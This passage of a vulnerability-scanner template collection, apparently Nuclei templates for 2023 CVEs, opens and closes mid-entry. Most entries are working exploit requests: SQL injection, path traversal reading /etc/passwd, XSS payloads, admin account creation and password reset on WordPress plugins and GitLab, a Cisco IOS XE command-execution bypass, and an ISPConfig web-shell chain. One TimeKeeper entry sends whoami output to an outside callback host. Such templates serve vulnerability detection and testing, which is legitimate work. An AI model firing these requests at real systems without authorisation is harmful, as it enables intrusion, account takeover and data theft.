{{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","part":"body","words":["HotelDruid</a>"],"internal":true}]},{"raw":["@timeout: 20s\nPOST /hoteldruid/personalizza.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naggiorna_qualcosa=SI&anno=2023&attiva_phpr_log=Enable&id_sessione=1&id_utente_log=0'%2b(SELECT%207151%20FROM%20(SELECT(SLEEP(5)))EAXh)%2b'&id_utente_mod=1\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(body, \"HotelDruid:\")"],"condition":"and"}]}]},{"id":"CVE-2023-6909","info":{"name":"Mlflow <2.9.2 - Path Traversal","severity":"high"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1\nHost: {{Hostname}}\n\n{\"name\" : \"{{randstr}}\", \"artifact_location\": \"http:///?/../../../../../../../../../../../../../../etc/\"}\n","POST /api/2.0/mlflow/runs/create HTTP/1.1\nHost: {{Hostname}}\n\n{\"experiment_id\": \"{{EXPERIMENT_ID}}\"}\n","POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\n\n{\"name\": \"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\n\n{\"name\" : \"{{randstr}}\", \"run_id\": \"{{RUN_ID}}\", \"source\" : \"file:///etc/\"}\n","GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header_5","words":["filename=passwd","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","part":"body_1","name":"EXPERIMENT_ID","group":1,"json":[".experiment_id"],"internal":true},{"type":"json","part":"body_2","name":"RUN_ID","group":1,"json":[".run.info.run_id"],"internal":true}]}]},{"id":"CVE-2023-41266","info":{"name":"Qlik Sense Enterprise - Path Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/resources/qmc/fonts/../../../qrs/ReloadTask?xrfkey=1333333333333337&filter=.ttf"],"headers":{"Cookie":"X-Qlik-Session=13333333-3333-3333-3333-333333333337","X-Qlik-Xrfkey":"1333333333333337"},"matchers":[{"type":"dsl","dsl":["status_code == 400","contains(to_lower(set_cookie), 'x-qlik-session')","contains(body, 'The comparison expression does not consist of three elements')"],"condition":"and"}]}]},{"id":"CVE-2023-29489","info":{"name":"cPanel < 11.109.9999.116 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror=\"prompt(document.domain)\">aaaaaaaaaaaa","{{BaseURL}}/cpanelwebcall/<><img%20src=x%20onerror=\"prompt(document.domain)\">"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=\"prompt(document.domain)\">aaaaaaaaaaaa","Invalid webcall ID:"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2023-24737","info":{"name":"PMB v7.4.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /pmb/admin/convert/export_z3950.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3@1=<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-31465","info":{"name":"TimeKeeper by FSMLabs - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /getsamplebacklog?arg1=2d0ows2x9anpzaorxi9h4csmai08jjor&arg2=%7b%22type%22%3a%22client%22%2c%22earliest%22%3a%221676976316.328%7c%7cnslookup%20%24(xxd%20-pu%20%3c%3c%3c%20%24(whoami)).{{interactsh-url}}%7c%7cx%22%2c%22latest%22%3a1676976916.328%2c%22origins%22%3a%5b%7b%22ip%22%3a%22{{Hostname}}%22%2c%22source%22%3a0%7d%5d%2c%22seriesID%22%3a3%7d&arg3=undefined&arg4=undefined&arg5=undefined&arg6=undefined&arg7=undefined HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["{\"seriesID\":"]}]}]},{"id":"CVE-2023-37728","info":{"name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27","{{BaseURL}}/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(header, \"IceWarp\") || contains(body, \"IceWarp WebClient\")","contains(body, \"<img src onerror=alert(document.domain)>\")"],"condition":"and"}]}]},{"id":"CVE-2023-32243","info":{"name":"WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset","severity":"critical"},"requests":[{"raw":["GET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/wp/v2/users/ HTTP/1.1\nHost: {{Hostname}}\n","GET /?rest_route=/wp/v2/users HTTP/1.1\nHost: {{Hostname}}\n","GET /feed/ HTTP/1.1\nHost: {{Hostname}}\n","GET /author-sitemap.xml HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=login_or_register_user&eael-resetpassword-submit=true&page_id=124&widget_id=224&eael-resetpassword-nonce={{nonce}}&eael-pass1={{password}}&eael-pass2={{password}}&rp_login={{wordpress_username}}\n"],"payloads":{"password":["{{randstr}}"]},"host-redirects":true,"max-redirects":2,"stop-at-first-match":true,"matchers":[{"type":"word","part":"body_6","words":["\"success\":true","\"data\":"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body_1","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true},{"type":"json","part":"body","name":"wordpress_username","group":1,"json":[".[] | .slug",".[].name"],"internal":true},{"type":"regex","part":"body_4","name":"wordpress_username","group":1,"regex":["<dc:creator><!\\[CDATA\\[([A-Za-z]+)\\]\\]><\\/dc:creator>"],"internal":true},{"type":"regex","part":"body_5","name":"wordpress_username","group":1,"regex":["\\/author\\/([a-z-]+)\\/"],"internal":true},{"type":"dsl","dsl":["\"WP_USERNAME: \"+ wordpress_username + \" WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-3460","info":{"name":"Ultimate Member < 2.6.7 - Unauthenticated Privilege Escalation","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /index.php/register/?{{version}} HTTP/1.1\nHost: {{Hostname}}\n","GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n","POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser_login-{{formid}}={{username}}&user_email-{{formid}}={{email}}&user_password-{{formid}}={{password}}&confirm_user_password-{{formid}}={{password}}&first_name-{{formid}}={{firstname}}&last_name-{{formid}}={{lastname}}&form_id={{formid}}&um_request=&_wpnonce={{wpnonce}}&wp_c%C3%A0pabilities%5Badministrator%5D=1\n"],"matchers":[{"type":"dsl","dsl":["contains(to_lower(body_1), \"ultimate member\")","regex(\"wordpress_logged_in_[a-z0-9]{32}\", header_4)","status_code_4 == 302"],"condition":"and"}],"extractors":[{"type":"regex","name":"path","part":"location_2","group":1,"regex":["([a-z:/.]+)"],"internal":true},{"type":"regex","name":"version","part":"body_1","group":1,"regex":["(?i)Stable.tag:\\s?([\\w.]+)"],"internal":true},{"type":"regex","name":"formid","part":"body_3","group":1,"regex":["name=\"form_id\" id=\"form_id_([0-9]+)\""],"internal":true},{"type":"regex","name":"wpnonce","part":"body_3","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\""],"internal":true},{"type":"dsl","dsl":["\"WP_USERNAME: \"+ username","\"WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-23489","info":{"name":"WordPress Easy Digital Downloads 3.1.0.2/3.1.0.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/easy-digital-downloads/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(body_1, \"[]\") && contains(body_2, \"Easy Digital Downloads\")"],"condition":"and"}]}]},{"id":"CVE-2023-3188","info":{"name":"Owncast - Server Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /api/remotefollow HTTP/1.1\nHost: {{Hostname}}\n\n{\"account\":\"a@{{interactsh-url}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"]},{"type":"word","part":"body","words":["success\":","message\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]}]}]},{"id":"CVE-2023-6567","info":{"name":"LearnPress <= 4.2.5.7 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 20s\nGET /wp-json/lp/v1/courses/archive-course?&order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains_all(header, \"lp_session_guest=\", \"application/json\")","contains_all(body, \"status\\\":\\\"success\", \"No courses were found\")"],"condition":"and"}]}]},{"id":"CVE-2023-0527","info":{"name":"Online Security Guards Hiring System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /search-request.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchdata=<img%20src=x%20onerror=alert(document.domain)>&search=\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<img src=x onerror=alert(document.domain)>\")","contains(body, \"Online Security Gauard Hiring System |Search Request\")"],"condition":"and"}]}]},{"id":"CVE-2023-44812","info":{"name":"mooSocial v.3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","part":"body","words":["mooSocial"],"internal":true,"case-insensitive":true}]},{"method":"GET","path":["{{BaseURL}}/admin/home/login?admin_redirect_url=aHR0cDovL2xvY2FsaG9zdC9tb29zb2NpYWwvYWRtaW4vcGx1Z2lucw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3etest"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-35843","info":{"name":"NocoDB version <= 0.106.1 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/{{repeat('..%2F', 5)}}etc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-46818","info":{"name":"ISPConfig - PHP Code Injection","severity":"high"},"requests":[{"raw":["POST /login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&s_mod=login\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"Set-Cookie\")","status_code == 302"],"condition":"and"}]},{"raw":["POST /admin/language_edit.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nlang=en&module=help&lang_file={{lang-file}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(response, \"_csrf_id\", \"_csrf_key\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"lang_file_location","group":1,"regex":["<legend>Language file: (.*)</legend>"],"internal":true},{"type":"regex","name":"csrf_id","group":1,"regex":["_csrf_id\" value=\"(.*)\" />"],"internal":true},{"type":"regex","name":"csrf_key","group":1,"regex":["_csrf_key\" value=\"(.*)\" />"],"internal":true}]},{"raw":["POST /admin/language_edit.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlang=en&module=help&lang_file={{lang-file}}&_csrf_id={{csrf_id}}&_csrf_key={{csrf_key}}&records[%5C]={{payload-url-enc}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200"]}]},{"raw":["GET /admin/{{websh-file}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nC: {{base64('\u00a7echo-cmd\u00a7')}}\n"],"matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"word","words":["{{echo-cmd-hash}}"]}]},{"raw":["GET /admin/{{websh-file}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nC: {{base64('rm \u00a7lang_file_location\u00a7')}}\n"],"matchers":[{"type":"status","status":[200]}]},{"raw":["GET /admin/{{websh-file}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nC: {{base64('rm \u00a7websh-file\u00a7')}}\n"],"matchers":[{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24278","info":{"name":"Squidex <7.4.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/squid.svg?title=Not%20Found&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&small"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","looking for!"],"condition":"and"},{"type":"word","part":"header","words":["image/svg+xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-43325","info":{"name":"MooSocial 3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/test%22%3E%3Cimg%20src=a%20onerror=alert(document.domain)%3Etest"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"<img src=a onerror=alert(document.domain)>\", \"mooSocial\")"],"condition":"and"}]}]},{"id":"CVE-2023-34843","info":{"name":"Traggo Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-36144","info":{"name":"Intelbras Switch - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/exportCfgwithpasswd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["System Description","System Version","System Name"],"condition":"and"},{"type":"word","part":"header","words":["attachment;filename="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1434","info":{"name":"Odoo - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/web/set_profiling?profile=0&collectors=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","\"params\":","session"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3936","info":{"name":"Blog2Social < 7.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=blog2social&origin=publish_post&deletePostStatus=success&deletedPostsNumber=1<img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Deleted 1<img src onerror=alert(document.domain)> posts"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-7028","info":{"name":"GitLab - Account Takeover via Password Reset","severity":"high"},"requests":[{"raw":["GET /users/sign_in HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"token","group":1,"regex":["name=\"authenticity_token\" value=\"([A-Za-z0-9_-]+)\""],"internal":true}]},{"raw":["@timeout: 20s\nPOST /users/password HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/users/password/new\n\nauthenticity_token={{token}}&user[email][]={{username}}&user[email][]={{rand_base(6)}}@{{interactsh-url}}\n"],"payloads":{"username":["admin@example.com","admin@{{RDN}}","root@{{RDN}}","gitlab@{{RDN}}","git@{{RDN}}"]},"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'smtp')"]}],"extractors":[{"type":"dsl","dsl":["username"]}]}]},{"id":"CVE-2023-20198","info":{"name":"Cisco IOS XE - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /%2577eb%2575i_%2577sma_Http HTTP/1.1\nHost: {{Hostname}}\n\n<?xml version=\"1.0\"?> <SOAP:Envelope xmlns:SOAP=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"> <SOAP:Header> <wsse:Security xmlns:wsse=\"http://schemas.xmlsoap.org/ws/2002/04/secext\"> <wsse:UsernameToken SOAP:mustUnderstand=\"false\"> <wsse:Username>admin</wsse:Username><wsse:Password>*****</wsse:Password></wsse:UsernameToken></wsse:Security></SOAP:Header><SOAP:Body><request correlator=\"exec1\" xmlns=\"urn:cisco:wsma-exec\"> <execCLI xsd=\"false\"><cmd>{{cmd}}</cmd><dialogue><expect></expect><reply></reply></dialogue></execCLI></request></SOAP:Body></SOAP:Envelope>"],"matchers":[{"type":"regex","part":"body","regex":["XMLSchema","execLog","Cisco Systems","<text>","<received>"],"condition":"and"}],"extractors":[{"type":"regex","part":"body","group":1,"regex":["<text>\\n(.*)\\["]}]}]},{"id":"CVE-2023-4714","info":{"name":"PlayTube 3.0.1 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["razorpay_options","PlayTube","key:"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","regex":["key: \"([a-z_A-Z0-9]+)\""]}]}]},{"id":"CVE-2023-26360","info":{"name":"Unauthenticated File Read Adobe ColdFusion","severity":"high"},"requests":[{"raw":["POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_variables=%7b%22_metadata%22%3a%7b%22classname%22%3a%22i/../lib/password.properties%22%7d%2c%22_variables%22%3a%5b%5d%7d\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["password=","encrypted=true","adobe"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2023-6553","info":{"name":"Worpress Backup Migration <= 1.3.7 - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/backup-backup/readme.txt"],"matchers":[{"type":"dsl","internal":true,"dsl":["status_code == 200","contains(body, \"Backup Migration\")"],"condition":"and"}]},{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/backup-backup/includes/backup-heart.php"],"headers":{"Content-Dir":"{{rand_text_alpha(10)}}"},"matchers":[{"type":"dsl","dsl":["len(body) == 0","status_code == 200","!contains(body, \"Incorrect parameters\")"],"condition":"and"}]}]},{"id":"CVE-2023-35155","info":{"name":"XWiki - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/view/Main/?viewer=share&send=1&target=&target=%3Cimg+src+onerror%3Dalert%28document.domain%29%3E&includeDocument=inline&message={{randstr}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>","Applications</h2>","Navigation</h2"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-28665","info":{"name":"Woo Bulk Price Update <2.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=techno_get_products&page=<svg%20onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"<svg onload=alert(document.domain)>\")","contains(body_2, \"pagination\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2023-30868","info":{"name":"Tree Page View Plugin < 1.6.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type_2, \"text/html\")","contains(body_2, \"%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\") && contains(body_2, \"CMS Tree Page View\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-31446","info":{"name":"Cassia Gateway Firmware - Remote Code Execution","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /bypass/config?type=sqs&keyId=test&key=security&queueUrl=http://{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","regex":["^OK$"]}]}]},{"id":"CVE-2023-29298","info":{"name":"Adobe ColdFusion - Access Control Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}//CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}"]},{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200","len(trim_space(body)) == 106"],"condition":"and"}]}]},{"id":"CVE-2023-27587","info":{"name":"ReadToMyShoe - Generation of Error Message Containing Sensitive Information","severity":"medium"},"requests":[{"raw":["POST /api/add-article-by-text HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/json\n\n{\n  \"title\":\"Kernsicherheitstest\",\n  \"body\":\"Kernsicherheitstest\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains((body), 'https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=REDACTED')"]},{"type":"word","words":["Caused by:","TTS request failed"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-1408","info":{"name":"Video List Manager <= 1.7 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/admin.php?page=tnt_video_edit_page&videoID=SLEEP(7) HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains_all(body_2, \"Edit Video\",\"Youtube</option>\")"],"condition":"and"}]}]},{"id":"CVE-2023-0126","info":{"name":"SonicWall SMA1000 LFI","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/images//////////////////../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["content/unknown"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6275","info":{"name":"TOTVS Fluig Platform - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mobileredir/openApp.jsp?redirectUrl=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E","{{BaseURL}}/mobileredir/openApp.jsp?user=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>","fluig://"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1020","info":{"name":"Steveas WP Live Chat Shoutbox <= 1.4.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25b","no_participation"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-50968","info":{"name":"Apache OFBiz < 18.12.11 - Server Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /partymgr/control/{{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{parameter}}={\"http://{{interactsh-url}}/api\":\"{{str}}\"}\n"],"payloads":{"path":["getJSONuiLabel","getJSONuiLabelArray"],"parameter":["requiredLabel","requiredLabels"]},"attack":"clusterbomb","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["OFBiz.Visitor="]}]}]},{"id":"CVE-2023-22232","info":{"name":"Adobe Connect < 12.1.5 - Local File Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/download?download-url=/_a7/p49dm7f4qjyt/output/&name=exam.pdf"],"matchers-condition":"and","matchers":[{"type":"word","words":["Save to My Computer","exam.pdf","Click to Download"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-38501","info":{"name":"CopyParty v1.8.6 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(document.domain)%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"<img src=copyparty onerror=alert(document.domain)>\",\"\\\">go to\")"],"condition":"and"}]}]},{"id":"CVE-2023-5360","info":{"name":"WordPress Royal Elementor Addons Plugin <= 1.3.78 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=wpr_addons_upload_file HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------318949277012917151102295043236\n\n-----------------------------318949277012917151102295043236\nContent-Disposition: form-data; name=\"uploaded_file\"; filename=\"{{file}}.ph$p\"\nContent-Type: image/png\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n-----------------------------318949277012917151102295043236\nContent-Disposition: form-data; name=\"allowed_file_types\"\n\nph$p\n-----------------------------318949277012917151102295043236\nContent-Disposition: form-data; name=\"triggering_event\"\n\nclick\n-----------------------------318949277012917151102295043236\nContent-Disposition: form-data; name=\"wpr_addons_nonce\"\n\n{{nonce}}\n-----------------------------318949277012917151102295043236--\n","GET /wp-content/uploads/wpr-addons/forms/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["{{md5(string)}}"]}],"extractors":[{"type":"regex","name":"nonce","part":"body_1","group":1,"regex":["WprConfig\\s*=\\s*{[^}]*\"nonce\"\\s*:\\s*\"([^\"]*)\""],"internal":true},{"type":"regex","name":"filename","part":"body_2","group":1,"regex":["wp-content\\\\\\/uploads\\\\\\/wpr-addons\\\\\\/forms\\\\\\/(.*?).php"],"internal":true}]}]},{"id":"CVE-2023-3521","info":{"name":"FOSSBilling < 0.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /admin?_url=%2Fadmin&date_to='\"><img+src=x+onerror=alert(3)>&date_from='\"><img+src=x+onerror=alert(3)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(3)>","FOSSBilling"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22621","info":{"name":"Strapi Versions <=4.5.5 - SSTI to Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /admin/login HTTP/1.1\nHost: 